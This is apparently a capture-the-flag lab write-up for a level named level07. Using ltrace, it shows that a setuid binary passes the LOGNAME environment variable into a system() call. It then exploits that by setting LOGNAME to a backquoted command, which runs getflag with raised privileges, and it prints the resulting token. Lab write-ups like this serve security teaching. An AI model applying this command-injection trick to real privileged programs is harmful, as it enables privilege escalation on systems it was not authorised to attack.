# As in the past level, we got a setuid binary on our home
# The binary print a string "level07" 
# lets use ltrace to print the call stack

ltrace ./level07
>>>
__libc_start_main(0x8048514, 1, 0xbffff7a4, 0x80485b0, 0x8048620 <unfinished ...>
getegid()                                                                                                       = 2007
geteuid()                                                                                                       = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                             = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                             = 0
getenv("LOGNAME")                                                                                               = "level07"
asprintf(0xbffff6f4, 0x8048688, 0xbfffff29, 0xb7e5ee55, 0xb7fed280)                                             = 18
system("/bin/echo level07 "level07
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                          = 0

#At the first sight, we can think that the breach is in the system() call, but the breach is elsewhere: in the getenv() call
#getenv() allow us to retrieve an environnement variable

#after some test we see that the binary can be quickly summed up by system(echo ${LOGNAME})

#Lets use some unix string's based tricks to print the output of getflag

export LOGNAME=\`getflag\`

#(Dont forget the \ to escape the backquote)

#Now just run it

./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
